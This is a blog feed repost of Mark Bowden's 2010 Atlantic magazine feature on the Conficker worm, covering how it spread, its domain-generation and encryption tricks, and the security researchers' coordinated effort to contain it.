Neustar’s operation is professional, and illustrative. 
</p>
        <p>
The company runs a huge local-number-portability database. Almost every phone call
in North America, before it’s completed, must ask Neustar where to go. Back in the
old days, when the phone company was a monopoly, telecommunications were relatively
simple. You could figure out where a phone call was going, right down to the building
where the target phone would ring, just by looking at the number. Today we have competing
telephone companies, and cell phones, and a person’s telephone number is no longer
necessarily tied to a geographic location. In this more complex world, someone needs
to keep track of every single phone number, and know where to route calls so they
end up in the right place. Neustar performs this service for telephone calls, and
is one of many registries that oversee high-level Internet domains. It is, in Joffe’s
words, “the map.” 
</p>
        <p>
“If I disappear, there’s no map,” he says. “So if you take us down, whole countries
can actually disappear from the grid. They’re connected, but no one can find their
way there, because the map’s disappeared.” 
</p>
        <p>
A botnet like Conficker could theoretically be used to shut down Neustar’s system.
So Joffe helped form the Conficker Cabal. He scoffed when he read in late 2009 that
the Obama administration’s Department of Homeland Security planned to hire “a thousand”
computer-security experts over the next three years. “There aren’t more than a few
hundred people in the world who understand this stuff.” 
</p>
        <p>
Most of us use the word <i>virus</i> to describe all malware, but in geekspeak, it
means something more specific. There are three types of the stuff: Trojans, viruses,
and worms. A Trojan is a piece of software that works like a Trojan horse, masquerading
as one thing to get inside a computer, and then attacking. A virus attacks the host
computer after slipping in through a hole in its operating system. It depends on the
computer-operator—you—doing something stupid to activate it, like opening an attachment
to an e-mail that appears innocuous, or clicking on an enticing link. A worm works
like a virus, exploiting flaws in operating systems, but it doesn’t attack once it
breaks in. It generally doesn’t have a malicious payload. Exactly like the most-sophisticated
viruses in the biological world, it does not cripple or kill its host. It is primarily
designed to spread. The instructions that will put a worm like Conficker to work are
not embedded in its code; they will be delivered later, from a remote command center. 
</p>
        <p>
In the old days, when your computer got infected, it slowed down because your commands
had to compete for processing with viral invaders. You knew something was wrong because
the machine took 10 times longer to boot up, or there was a delay between command
and response. You began to get annoying pop-ups on your screen directing you to download
supposedly remedial software. Programs would freeze. In this sense, the old malware
was like the Ebola virus, a very scary strain that messily kills nearly everyone it
infects—which is another way of saying that it is grossly ineffective, because it
burns out the very host organisms it needs to survive. The miscreants who created
computer viruses years ago learned that malware that announces itself in these ways
doesn’t last. 
</p>
        <p>
So today’s malware produces no pop-ups, no slowdowns. A worm is especially quiet,
since all it does, at least initially, is spread. Conficker stealthily sets up shop
without making a ripple, and—other than calling home periodically for instructions—just
waits. Its regular messages to its command center amount to only a couple hundred
bytes of data, which is not enough to even light up the little bulb that flashes when
a computer hard drive is at work. 
</p>
        <p>
After Phil Porras and others began snaring Conficker in increasing numbers, they began
dissecting it. The worm itself was exquisite. It consisted of only a few hundred lines
of code, no more than 35 kilobytes—slightly smaller than a 2,000-word document. In
comparison, the average home computer today has anywhere from 40 to 200 <i>gigabytes</i> of
storage. Unless you were looking for it, unless you knew <i>how</i> to look for it,
you would never see it. Conficker drifts in like a mote. 
</p>
        <p>
It exploited a specific hole, Port 445, in the Microsoft operating systems, a vulnerability
that the manufacturer had tried to repair just weeks earlier. Ports are designated
“listening” points in a system, designed to transmit and receive particular kinds
of data. There are many of them, more than 65,000, because an operating system consists
of layer upon layer of functions. A firewall is a security program that guards these
ports, controlling the flow of data in and out. Some ports, like the one that handles
e-mail, are heavily trafficked. Most are not; they listen for updates and instructions
that deal with a narrow and specific function, usually routine procedures that never
rise to the notice of computer-users. Only certain very specific kinds of data can
flow through ports, and then only with the appropriate codes. Windows opens Port 445
by default to perform tasks like issuing instructions for print-sharing or file-sharing.
Late in the summer of 2008, Microsoft learned that even a system protected by a firewall
was vulnerable at Port 445 if print-sharing and file-sharing were enabled (which they
were on many computers). In other words, even a well-protected computer had a hole.
On October 23, 2008, the company issued a rare “critical security bulletin” (<a href="http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx">MS08-067</a>)
with a patch to repair that hole. A specially crafted “remote procedure call” could
allow the port to be used by a remote operator, the security bulletin warned, and
“an attacker could exploit this vulnerability without authentication to run arbitrary
code.” The patch Microsoft offered theoretically slammed the door on a worm like Conficker
almost a month before it appeared. 
</p>
        <p>
Theoretically. 
</p>
        <p>
In fact, the bulletin itself may have inspired the creation of Conficker. Many, many
computer-operators worldwide—you know who you are—fail to diligently heed security
updates. And the patches are issued only to computers with validated software installations;
millions of computers run on bootlegged operating systems, which have never been validated.
Microsoft issues its updates on the second Tuesday of every month. Every geek in the
world knows this; it’s called “Patch Tuesday.” The company employs some of the best
programmers in the world to stay one step ahead of the bad guys. If everyone applied
the new patches promptly, Windows would be nigh impregnable. But because so many people
fail to apply the patches promptly, and because so many machines run on illegitimate
Windows systems, Patch Tuesday has become part of Microsoft’s problem. The company
points out its own vulnerabilities, which is like a general responsible for defending
a fort making a public announcement—“The back door to the supply shed in the southeast
corner of the garrison has a broken lock; here’s how to fix it.” When there is only
one fort, and it is well policed, the lock is fixed and the vulnerability disappears.
But when you are defending millions of forts, and a goodly number of the people responsible
for their security snooze right through Patch Tuesday, the security bulletin doesn’t
just invite attack, it provides a map! Twenty-eight days after the MS08-067 security
bulletin appeared, Conficker started worming its way into unpatched computers. 
</p>
        <p>
          <b>The Cabal’s Sandboxes </b>
        </p>
        <p>
Conficker’s rate of replication got everyone’s attention, so a loose-knit gaggle of
geeky “good guys,” including Porras, Joffe, and DiMino, began picking the worm apart.
The online-security community consists of software manufacturers like Microsoft, companies
like Symantec that sell security packages to computer owners, large telecommunication
registries like Neustar and VeriSign, nonprofit research centers like SRI International,
and botnet hunters like Shadowserver. In addition to maintaining honeypots, these
security experts operate “sandboxes”—isolated computers (or, again, virtual computers
inside larger ones) where they can place a piece of malware, turn it on, and watch
it run. In other words, where they can play with it. 
</p>
        <p>
They all started playing with Conficker, comparing notes on what they found, and brainstorming
ways to defeat it. That’s when someone dubbed the group the “Conficker Cabal,” and
the name stuck, despite discomfort with the darker implications of the word. Here
are some of the things the cabal discovered about the worm in those first few weeks: 
</p>
        <blockquote>• It patched the hole it came through at Port 445, making sure it would
not have to compete with other worms. This was smart, because surely other hackers
had seen security bulletin MS08-067. 
<br />
• It tried to prevent communication with security providers (many computer-users subscribe
to commercial services that regularly update antivirus software). 
<br />
• When it started, if the IP address of the infected computer was Ukrainian, the worm
self-destructed. When in attack mode, searching for other computers to infect, it
skipped any with a Ukrainian IP address. 
<br />
• It disabled the Windows “system restore” points, a useful tool that allows users
with little expertise to simply reset an infected machine to a date prior to its infection.
(System restore is one of the easiest ways to debug a machine.) </blockquote>
        <p>
All of these things were clever. They indicated that Conficker’s creator was up on
all the latest tricks. But the main feature that intrigued the cabal was the way the
worm called home. This is, of course, what worms designed to create botnets do. They
settle in and periodically contact a command center to receive instructions. Botnet
hunters like DiMino regularly wipe out whole malicious networks by deciphering the
domain name of the command center and then getting it blocked. In the old days, this
was easier because malware pointed to only a few IP addresses, which could be blocked
by hosting providers and Internet service providers. The newer worms like Conficker
bumped the game up to a higher level, generating domain names that involve many providers
and a wide range of IP addresses, and that security experts can block only by contacting
Internet registries—organizations that manage the domain registrations for their realm.
But Conficker did not call home to a fixed address. 
</p>
        <p>
Shortly after it was discovered, the worm began performing a new operation: generating
a list of domain names seemingly at random, 250 a day across five top-level domains
(top-level domains are defined by the final letters in a Web address, such as <i>.com</i> or <i>.edu</i> or <i>.uk</i>).
The worm would then go down the list until it hit upon the one connected to its remote
controller’s server. All Conficker’s controller had to do was register one of the
addresses, which can be done for a fee of about $10, and await the worm’s regular
calls. If he wished, he could issue instructions. It was as if the boss of a crime
family told his henchmen to check in daily by turning to the bottom of a certain page
in each day’s <i>Racing Form</i>, where there would be a list of potential numbers.
They would then call each number until the boss picked up. So it was not apparent
from day to day where the worm would call home. 
</p>
        <p>
With the <i>Racing Form</i> trick, if you were a cop and were tipped off where to
look, you might arrange with the paper’s publisher to see the page before it was printed,
and thus be one step ahead of the henchmen and their boss. To defeat Conficker, the
geeks would have to figure out in advance what the numbers (or, in this case, domain
names) would be, and then hustle to either buy up or contact every one, block it,
or cajole whoever owned it to cooperate before the worm “made the call.” 
</p>
        <p>
Michael Ligh, a young Brooklyn researcher employed by the computer-security company
iDefense, is one of several people who went to work unraveling Conficker’s methods.
Ligh and others had seen algorithms for random-domain-name generation before, and
most were keyed to the infected computer’s clock. If new places to call home must
be generated every day, or every few hours, then the worm needs to know when to perform
the procedure. So the malware simply checks the time on its host computer. This provided
the good guys with a tool to defeat it. They turned the clock forward on their sandbox
computer, forcing their captured strain of the worm to spit out all the domain names
it would generate for as long into the future as they cared to look. It was like stealing
the teacher’s edition of a classroom textbook, the one with all the answers to the
quizzes and tests printed in the back. Once you knew all the places the malware would
be calling, you could cordon off those sites in advance, effectively stranding the
worm. 
</p>
        <p>
Conficker had an answer for that. Instead of using the infected computer’s clock,
the worm set its schedule by the time on popular corporate home pages, like Yahoo,
Google, or Microsoft’s own msn.com. 
</p>
        <p>
“<i>That</i> was interesting,” Ligh said. “There was no way we could turn the clock
forward on Google’s home page.” 
</p>
        <p>
So there was no easy way to predict the list of domain names in advance. But there
was <i>a</i> way. The first step was to set up a proxy server to, in effect, intercept
the time update from the big corporate Web site before it got back to the worm, alter
the information, and then send it on. You could then tell the worm it was a date sometime
in the future, and the worm would spit out the domain names for that date. This was
a tedious way to proceed, since you could generate only one set of new domain names
at a time. So Ligh and other researchers reverse-engineered the worm’s algorithm,
extracted the time-update function, and wedded it to a piece of code they could control.
They instructed their copy to generate the future lists in advance. They could then
buy up or block all the sites, and direct all the worm’s communications into a “sinkhole,”
a dead-end location where calls go unanswered. Conficker’s creators had deliberately
made the task so onerous and expensive that <i>no one</i> would go to the trouble
of blocking all possible command centers. 
</p>
        <p>
Or so they thought. The cabal, through a determined and unprecedented effort, did
manage to cordon off the worm. By the end of 2008, Conficker had infected an estimated
1.5 million machines worldwide, but it was on its way to full containment. In the
great chess match, the good guys had called “Check!” 
</p>
        <p>
Then the worm turned. 
</p>
        <p>
          <b>MD-6 </b>
        </p>
        <p>
On December 29, 2008, a new version of Conficker showed up, and if the geeks had been
intrigued with the original version, they now experienced something more akin to respect
… mingled with fear. 
</p>
        <p>
One of the early theories about the worm was that it had slipped out of a computer-science
lab, the product of some fooling-around by a sophisticated graduate student or group
of students. They had loosed it on the world inadvertently, or maybe on purpose as
a prank or experiment without realizing how effective it would be. This hypothesis
appealed to optimists. 
</p>
        <p>
The new version of the worm, Conficker B, exploded the benevolent-accident theory.
It was clear that the worm’s creator had been watching every move the good guys made,
and was adjusting accordingly. He didn’t care that the good guys could predict its
upcoming lists of domain names. He just rejiggered the worm to spread the new lists
out over eight top-level domains instead of five, making the job of blocking them
far more difficult. The worm had no trouble contacting all of these locations. If
it received no command from one, it simply tried the next one on its list. Conficker
B could go on like this for months, even years. It had to find its controller only
once to receive instructions. 
</p>
        <p>
“That’s a high number,” Rodney Joffe, of Neustar, told me. “The cops will get sick
and tired of knocking on 250 doors a day and finding there’s no one there. And if
I’m the chief bad guy, all I have to do is be behind one of those doors on one of
those days.” 
</p>
        <p>
There were other improvements to Conficker. Among them: besides shutting down whatever
security system was installed on the computer it invaded, and preventing it from communicating
with computer-security Web sites, it stopped the computer from connecting with Microsoft
to perform Windows updates. So even though Microsoft was providing patches, the infected
machines could not get to them. In addition, it modified the computer’s bandwidth
settings to increase speed and propagate itself faster; and it began to spread itself
in different ways, including via USB drives. This last innovation meant that even
“closed” computer networks, those with no connection to the Internet, were vulnerable,
since users who cannot readily transmit files from point to point via the Web often
store and transport them on small USB drives. If one of those USB drives, or a CD,
was plugged into an infected computer, it could deliver the worm to an entire closed
network. 
</p>
        <p>
All of this was impressive—but something else stopped researchers cold. Analysts with
Conficker B isolated in their sandboxes could watch it regularly call home and receive
a return message. The exchange was in code, and not just any code. 
</p>
        <p>
Breaking codes used to be the province of clever puzzle masters, who during World
War II devised encryption and code-breaking methods so difficult that operators needed
machines to do the work. Computers today can perform so many calculations so fast
that, theoretically at least, no cipher is too difficult to crack. One simply applies
what computer scientists call “brute force”: trying every possible combination systematically
until the secret is revealed. The game is to make a cipher so difficult that the amount
of computing power needed to break it renders the effort pointless—the “thief” would
have to spend more to obtain the prize than the prize is worth. In his 1999 history
of code-making and -breaking, <i><a href="http://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323">The
Code Book</a></i>, Simon Singh wrote: “It is now routine to encrypt a message [so
securely] that all the computers on the planet would need longer than the age of the
universe to break the cipher.” 
</p>
        <p>
The basis for the highest-level modern ciphers is a public-key encryption method invented
in 1977 by three researchers at MIT: Ron Rivest (the primary author), Adi Shamir,
and Leonard Adleman. In the more than 30 years since it was devised, the method has
been improved several times. The National Institute of Standards and Technology sets
the <a href="http://www.itl.nist.gov/fipspubs/">Federal Information Processing Standard</a>,
which defines the cryptography algorithms that government agencies must use to protect
communications. Because it is the most sophisticated oversight effort of its kind,
the standard is determined by an international competition among the world’s top cryptologists,
with the winning entry becoming by default the worldwide standard. The current highest-level
standard is labeled SHA-2 (Secure Hash Algorithm–2). Both this and the first SHA standard
are versions of Rivest’s method. The international competition to upgrade SHA-2 has
been under way for several years and is tentatively scheduled to conclude in 2013,
at which point the new standard will become SHA-3. 
</p>
        <p>
Rivest’s proposal for the new standard, MD-6 (Message Digest–6), was submitted in
the fall of 2008, about a month before Conficker first appeared, and began undergoing
rigorous peer review—the very small community of high-level cryptographers worldwide
began testing it for flaws. 
</p>
        <p>
Needless to say, this is a very arcane game. The entries are comprehensible to very
few people. According to Rodney Joffe, “Unless you’re a subject-matter expert actively
involved in crypto-algorithms, you didn’t even know that MD-6 existed. It wasn’t like
it was put in <i>The New York Times</i>.” 
</p>
        <p>
So when the new version of Conficker appeared, and its new method of encrypting its
communication employed MD-6, Rivest’s <i>proposal</i> for SHA-3, the cabal’s collective
mind was blown. 
</p>
        <p>
“It was clear that these guys were not your average high-school kids or hackers or
predominantly lazy,” Joffe told me. “They were making use of some very, very sophisticated
techniques. 
</p>
        <p>
“Not only are we not dealing with amateurs, we are possibly dealing with people who
are superior to all of our skills in crypto,” he said. “If there’s a surgeon out there
who’s the world’s foremost expert on treating retinitis pigmentosa, he doesn’t do
bunions. The guy who is the world expert on bunions—and, let’s say, bunions on the
third digit of Anglo-American males between the ages of 35 and 40, that are different
than anything else—he doesn’t do surgery for retinitis pigmentosa. The knowledge it
took to employ Rivest’s proposal for SHA-3 demonstrated a similarly high level of
specialization. We found an equivalent of three or four of those in the code—different
parts of it. 
</p>
        <p>
“Take Windows,” he explained. “The understanding of Windows’ operating system, and
how it worked in the kernel, needed that kind of a domain expert, and they had that
kind of ability there. And we realized as a community that we were not dealing with
something normal. We’re dealing with one of two things: either we’re dealing with
incredibly sophisticated cyber criminals, or we’re dealing with a group that was funded
by a nation-state. Because this wasn’t the kind of team that you could just assemble
by getting your five buddies who play Xbox 360 and saying, ‘Let’s all work together
and see what we can do.’” 
</p>
        <p>
The plot thickened—it turned out that Rivest’s proposal, MD-6, had a flaw. Cryptologists
in the competition had duly gone to work trying to crack the code, and one had succeeded.
In early 2009, Rivest quietly withdrew his proposal, corrected it, and resubmitted
it. This gave the cabal an opening. If the original Rivest proposal was flawed, then
so was the encryption method for Conficker B. If they were able to eavesdrop on communications
between Conficker and its mysterious controller, they might be able to figure out
who he was, or who they were. How likely was it that the creator of Conficker would
know about the flaw discovered in MD-6? 
</p>
        <p>
Once again, the good guys had the bad guys in check. 
</p>
        <p>
About six weeks later, another new version of the worm appeared. 
</p>
        <p>
It employed Rivest’s <i>revised</i> MD-6 proposal. 
</p>
        <p>
Game on. 
</p>
        <p>
          <b>“Our Finest Hour” </b>
        </p>
        <p>
By early 2009, Conficker B had infected millions of machines. It had invaded the United
Kingdom’s Defense Ministry. As CBS prepared a <i><a href="http://www.cbsnews.com/stories/2009/03/27/60minutes/main4897053.shtml">60
Minutes</a></i><a href="http://www.cbsnews.com/stories/2009/03/27/60minutes/main4897053.shtml"> segment
on the worm</a>, its computers were struck. In both instances, security experts scrambled
to uproot the invader, badly disrupting normal functioning of the system. Conficker
now had the world’s attention. In February 2009, the cabal became more formal. Headed
initially by a Microsoft program manager, and eventually by Joffe, it became the Conficker
Working Group. Microsoft offered a $250,000 bounty for the arrest and conviction of
the worm’s creators. 
</p>
        <p>
The newly named team went to work trying to corral Conficker B. Getting rid of it
was out of the question. Even though they could scrub it from an infected computer,
there was no way they could scrub it from all infected computers. The millions of
machines in the botnet were spread all over the world, and most users of infected
ones didn’t even know it. It was theoretically feasible to unleash a counter-worm,
something to surreptitiously enter computers and take out Conficker, but in free countries,
privacy laws frown on invading people’s home computers. Even if all the governments
got together to allow a massive attack on Conficker—an unlikely event—the new version
of the worm had new ways of evading the threat. 
</p>
        <p>
Conficker C appeared in March 2009, and in addition to being impressed by its very
snazzy crypto, the Conficker Working Group noticed that the new worm’s code threatened
to up the number of domain names generated every day to 50,000. The new version would
begin generating that many domain names daily on April 1. At the same time, all computers
infected with the old variants of Conficker that could be reached would be updated
with this new strain. The move suggested that the bad guys behind Conficker understood
not just cryptology, but also the mostly volunteer nature of the cabal. 
</p>
        <p>
“You know you’re dealing with someone who not only knows how botnets work, but who
understands how the security community works,” Andre’ DiMino told me. “This is not
just a bunch of organized criminals that, say, commission someone to write a botnet
for them. They know the challenges that the security community faces internally, politically,
and economically, and are exploiting them as well.” 
</p>
        <p>
The bad guys knew, for instance, that preregistering even 250 domain names a day at
$10 a pop was doable for the good guys. As long as the number remained relatively
small, the cabal could stay ahead of them. But how could the good guys cope with a
daily flood of 50,000? It would require an unprecedented degree of cooperation among
competing security firms, software manufacturers, nonprofit organizations like Shadowserver,
academics, and law enforcement. 
</p>
        <p>
“You can’t just register all 50,000—you’ve got to go one by one and make sure the
domain name doesn’t already exist,” Joffe says. “And if it exists, you’ve got to make
sure that it belongs to a good guy, not a bad guy. You’ve got to make a damn phone
call for any of the new ones, and have to send someone out there to do it—and these
are spread all over the world, including some very remote places, Third World countries.
Now the bar had been raised to a level that was almost insurmountable.” 
</p>
        <p>
The worm was already running rings around the good guys, and then, just for good measure,
it planted a pie in their faces on, of all days, April 1. By playing with the new
variant in their sandboxes, the cabal knew that the enhanced domain-name-generating
algorithm would click in on that day. If the update succeeded, it would be a game-changer.
It was the most dramatic moment since Conficker had surfaced the previous November.
Apparently, at long last, this extraordinary tool was going to be put to use. But
for what? The potential was scary. Few people outside the upper echelon of computer
security even understood what Conficker was, much less what was at stake on April
1, but word of a vague impending digital doomsday spread. The popular press got hold
of it. There were headlines and the usual spate of ill-informed reports on cable TV
and the Internet. When the day arrived, those who had been warning about the dangers
of this new worm were sure to see their fears vindicated. 
</p>
        <p>
The cabal mounted a heroic effort to shut down the worm’s potential command centers
in advance of the update, coordinating directly with the Internet Corporation for
Assigned Names and Numbers, the organization that supervises registries worldwide.
“It was our finest hour,” Joffe says. 
</p>
        <p>
“I don’t think that the bad guys could have expected the research community to come
together as it did, because it was pretty unprecedented,” Ramses Martinez, director
of information security for VeriSign, told me. “That was a new thing that happened.
I mean, if you would have told me everybody’s going to come together—by <i>everybody</i>,
I mean all these guys in this computer-security world that know each other—and they’re
going to do this thing, I would have said, ‘You’re crazy.’ I don’t think the bad guys
could have expected that.” 
</p>
        <p>
Much of the computer world was watching, in considerable suspense, to see what would
happen on April 1. It was like the moment in a movie when the bad guy at last has
cornered the hero. He pulls out an enormous gun and aims it at the hero’s head, pulls
the trigger … and out pops a little flag with the word BANG!
</p>
        <p>
Conficker found one or two domain names that Joffe’s group had missed, which was all
it needed. The cabal’s efforts had succeeded in vastly reducing the number of machines
that got the update, but the ones that did went to work distributing a very conventional,
well-known malware called <a href="http://www.f-secure.com/v-descs/email-worm_w32_waledac_a.shtml">Waledac</a>,
which sends out e-mail spam selling a fake anti-spyware program. The worm was used
to distribute Waledac for two weeks, and then stopped. 
</p>
        <p>
But something much more important had happened. The updated worm didn’t just up the
ante by generating 50,000 domain names daily; it effectively moved the game out of
the cabal’s reach. 
</p>
        <p>
“April 1 came and went, and in the middle of that night the systems switched over
to the new algorithm,” Conficker C, Joffe told me. “That’s all that was supposed to
happen, and it happened. But the Internet didn’t get infected; it was just an algorithm
change in the software. So of course the press said, ‘Conficker is a bust.’” 
</p>
        <p>
Public concern over the worm fizzled, just as the problem grew worse: the new version
of Conficker introduced peer-to-peer communications, which was disheartening to the
good guys, to say the least. Peer-to-peer operations meant the worm no longer had
to sneak in through Windows Port 445 or a USB drive; an infected computer spread the
worm directly to every machine it interacted with. It also meant that Conficker no
longer needed to call out to a command center for instructions; they could be distributed
directly, computer to computer. And since the worm no longer needed to call home,
there was no longer any way to tell how many computers were infected. 
</p>
        <p>
In the great chess match, the worm had just pronounced “Checkmate.” 
</p>
        <p>
          <b>Watching and Waiting </b>
        </p>
        <p>
As of this writing, 17 months after it appeared and about a year after the April 1
update, Conficker has created a stable botnet. It consists of anywhere from hundreds
of thousands of computers to 12 million. No one knows for sure anymore, because with
peer-to-peer communications, the worm no longer needs to check in with an outside
command center, which is how the good guys kept count. Joffe estimates that with the
four distinct strains (yet another one appeared on April 8, 2009), 6.5 million computers
are probably infected. 
</p>
        <p>
The investigators see no immediate chance or even any effective way to kill it. 
</p>
        <p>
“There are a bunch of infected machines that are out there, and they can be taken
over, given the right circumstances, by the bad guys,” VeriSign’s Martinez says. “Will
they do that? I don’t know. So it’s a potential threat. It’s something that’s out
there, sitting there, and it needs to be addressed, but I don’t think, honestly, that
we know how. How do we address this? If it was sitting in the U.S., it would be a
fairly easy thing to do. The fact is that it’s spread out all around the world.” 
</p>
        <p>
Ever since the paltry Waledac scam, the worm has been biding its time. 
</p>
        <p>
“They are watching us watch them,” says Andre’ DiMino, the botnet hunter. “I think
it’s really either that or somebody let this thing get bigger, and it’s advanced bigger
and further than they ever dreamed possible. A lot of people think that. But in looking
at the sophistication of this thing and looking at the evolution of this thing, I
think they knew exactly what they were doing. I think they were trying something,
and I think that they’re too smart to do what everybody figured they were going to
do. You have to remember, the world was watching this thing and waiting for the world
to end from Conficker on April 1, 2009. The last thing you’d want to do if you’re
the bad guy is make something happen on April 1. You’re never going to do that, because
everybody’s watching it. You’re going to do something when you’re least suspected.
So these guys are sophisticated. They have good code. And just even seeing the evolution
from Conficker A to B to C, where there’s the peer-to-peer component, which … strikes
fear into the heart of botnet hunters because it’s just so damn difficult to track—these
guys know exactly what they’re doing.” 
</p>
        <p>
So who are they? 
</p>
        <p>
One of the things Martinez’s team does, patrolling the perimeter at VeriSign looking
for threats, is dip into the obscure digital forums where cyber criminals converse.
Those who are engaged in writing sophisticated malware boast and threaten and compare
notes. The good guys venture in to collect intelligence, or just out of curiosity,
or for fun. They sometimes pretend to be malware creators themselves, sometimes not.
Sometimes they engage in a little cyber trash talk. 
</p>
        <p>
“In the past you were just sort of making sure they didn’t steal your proprietary
information,” Martinez says. “Now we go in to engage them. You talk to them and you
exchange information. You have a guy in Russia selling malware, working with a guy
in Mexico doing phishing attacks, who’s talking to a kid in Brazil, who’s doing credit-card
fraud, and they’re introducing each other to some guy in China doing something else.” 
</p>
        <p>
Martinez said he recently eavesdropped on a dialogue between a security researcher
and a man he suspects was at least partly responsible for Conficker. He wouldn’t say
how he drew that connection, only that he had good reasons for believing it to be
true. The suspect in the conversation was eastern European. The standard image of
a malware creator is the Hollywood one: a brilliant 20-something with long hair and
a bad attitude, in need of a bath. This is not how Martinez sees his nemesis—or nemeses. 
</p>
        <p>
“I see him, or them, as a really well-educated, smart businessman,” he said. “He may
be 50 years old. These guys are not chumps. They’re not just out to make a buck.” 
</p>
        <p>
The eastern European, backpedaling from further dialogue with the security geek, wrote,
“You’re the good guys; we’re the bad guys. Bacillus can’t live with antibodies.” 
</p>
        <p>
“Now, I didn’t grow up in a bad neighborhood or anything,” said Martinez, “but the
few thugs that I saw would never use a word like <i>bacillus</i> or make an analogy
like that.” 
</p>
        <p>
One of the early clues in the hunt was the peculiarity in the Conficker code that
made computers with active Ukrainian keyboards immune. Much of the world’s aggressive
malware comes from eastern Europe, where there are high levels of education and technical
expertise, and also thriving organized criminal gangs. Martinez believes Conficker
was written by a group of highly skilled programmers. Like Joffe, he sees it as a
group of creators, because designing the worm required expertise in so many different
disciplines. He suspects that these skilled programmers and technicians either were
hired by a criminal gang, or created the worm as their own illicit business venture.
If that’s true, then the Waledac maneuver was like flexing Conficker’s pinkie—just
a demonstration, a way of showing that despite the best and most concerted effort
of the world’s computer-security establishment, the worm was fully operational and
under their control. 
</p>
        <p>
Will they be caught? 
</p>
        <p>
“I have no idea,” Martinez says. “I would say probably not. I’ll be shocked if they’re
ever arrested. And arrest them for what? Is breaking into people’s computers even
illegal where they’re from? Because in a lot of countries, it isn’t. As a matter of
fact, in some countries, unless you’re touching a computer in their jurisdiction,
their country, that’s not illegal. So who’s going to arrest them, even if we know
who they are?” 
</p>
        <p>
Ridding computers of the worm poses another kind of overwhelming problem. 
</p>
        <p>
“There are controls, or checks and balances, in place to limit what police can do,
because we have civil liberties to protect,” he says. “If you do away with these checks
and balances, where the government can come in and reimage your computer overnight,
now you’re infringing on people’s civil liberties. So, I mean, we can talk about this
all day, but I’ll tell you, it’s going to be a long time, in my opinion, before we
really see the government being able to effectively deal with cyber crime, because
I think we’re still learning as a culture, as a nation, and as a world how to deal
with this stuff. It’s too new.” 
</p>
        <p>
Imagining Conficker’s creators as a skilled group of illicit cyber entrepreneurs remains
the prevailing theory. Some of the good guys feel that the worm will never be used
again. They argue that it has become too notorious, too visible, to be useful. Its
creators have learned how to whip computer-security systems worldwide, and will now
use that knowledge to craft an even stealthier worm, and perhaps sell it to the highest
bidder. Few believe Conficker itself is the work of any one nation, because other
than the initial quirk of the Ukrainian-keyboard exemption, it spreads indiscriminately.
China is the nation most often suspected in cyber attacks, but there may be more Conficker-infected
computers in China than anywhere else. Besides, a nation seeking to create a botnet
weapon is unlikely to create one as brazen as Conficker, which from the start has
exhibited a thumb-in-your-eye, catch-me-if-you-can personality. It is hard to imagine
Conficker’s creators not enjoying the high level of cyber gamesmanship. The good guys
certainly have. 
</p>
        <p>
“It’s cops and robbers, so to speak, and that was a really interesting aspect of the
work for me,” says Martinez. “It’s guys trying to outwit each other and exploit vulnerabilities
in this vast network.” 
</p>
        <p>
In chess, when your opponent checkmates you, you have no recourse. You concede and
shake the victor’s hand. In the real-world chess match over Conficker, the good guys
have another recourse. They can, in effect, upend the board and go after the bad guys
physically. Which is where things stand. The hunt for the mastermind (or masterminds)
behind the worm is ongoing. 
</p>
        <p>
“It’s an active investigation,” Joffe says. “That’s all I can say. Law enforcement
is fully engaged. We have some leads. This story is not over.” 
</p>
        <p>
          <strong>This article available online at:</strong>
          <a href="http://www.theatlantic.com/magazine/archive/2010/06/the-enemy-within/8098/">http://www.theatlantic.com/magazine/archive/2010/06/the-enemy-within/8098/</a>
        </p>
      </body>
      <title>The Enemy Within</title>
      <guid isPermaLink="false">http://www.loosy-goosy-ness.com/PermaLink,guid,58a7c601-2511-40c8-a988-07af4fe2d9ca.aspx</guid>
      <link>http://www.loosy-goosy-ness.com/2010/05/19/TheEnemyWithin.aspx</link>
      <pubDate>Wed, 19 May 2010 20:03:57 GMT</pubDate>
      <description>&lt;p&gt;
&lt;em&gt;When the Conficker computer “worm” was unleashed on the world in November 2008,
cyber-security experts didn’t know what to make of it. It infiltrated millions of
computers around the globe. It constantly checks in with its unknown creators. It
uses an encryption code so sophisticated that only a very few people could have deployed
it. For the first time ever, the cyber-security elites of the world have joined forces
in a high-tech game of cops and robbers, trying to find Conficker’s creators and defeat
them. The cops are failing. And now the worm lies there, waiting …&lt;/em&gt;
&lt;/p&gt;
&lt;h6&gt;By Mark Bowden
&lt;/h6&gt;
&lt;p&gt;
&lt;img src="http://assets.theatlantic.com/static/coma/images/issues/201006/conficker-wide.jpg" /&gt; 
&lt;br /&gt;
&lt;em&gt;Image credit: Alex Ostroy &lt;/em&gt;
&lt;/p&gt;
&lt;p&gt;
The first surprising thing about the worm that landed in Philip Porras’s digital petri
dish 18 months ago was how fast it grew. 
&lt;/p&gt;
&lt;p&gt;
He first spotted it on Thursday, November 20, 2008. Computer-security experts around
the world who didn’t take notice of it that first day soon did. Porras is part of
a loose community of high-level geeks who guard computer systems and monitor the health
of the Internet by maintaining “honeypots,” unprotected computers irresistible to
“malware,” or malicious software. A honeypot is either a real computer or a virtual
one within a larger computer designed to snare malware. There are also “honeynets,”
which are networks of honeypots. A worm is a cunningly efficient little packet of
data in computer code, designed to slip inside a computer and set up shop without
attracting attention, and to do what this one was so good at: replicate itself. 
&lt;/p&gt;
&lt;p&gt;
Most of what honeypots snare is routine, the viral annoyances that have bedeviled
computer-users everywhere for the past 15 years or so, illustrating the principle
that any new tool, no matter how useful to humankind, will eventually be used for
harm. Viruses are responsible for such things as the spamming of your inbox with penis-enlargement
come-ons or million-dollar investment opportunities in Nigeria. Some malware is designed
to damage or destroy your computer, so once you get the infection, you quickly know
it. More-sophisticated computer viruses, like the most successful biological viruses,
and like this new worm, are designed for stealth. Only the most technically capable
and vigilant computer-operators would ever notice that one had checked in. 
&lt;/p&gt;
&lt;p&gt;
Porras, who operates a large honeynet for &lt;a href="http://www.sri.com/"&gt;SRI International&lt;/a&gt; in
Menlo Park, California, noted the initial infection, and then an immediate reinfection.
Then another and another and another. The worm, once nestled inside a computer, began
automatically scanning for new computers to invade, so it spread exponentially. It
exploited a flaw in Microsoft Windows, particularly Windows 2000, Windows XP, and
Windows Server 2003—some of the most common operating systems in the world—so it readily
found new hosts. As the volume increased, the rate of repeat infections in Porras’s
honeynet accelerated. Within hours, duplicates of the worm were crowding in so rapidly
that they began to push all the other malware, the ordinary daily fare, out of the
way. If the typical inflow is like a stream from a faucet, this new strain seemed
shot out of a fire hose. It came from computer addresses all over the world. Soon
Porras began to hear from others in his field who were seeing the same thing. Given
the instant and omnidirectional nature of the Internet, no one could tell where the
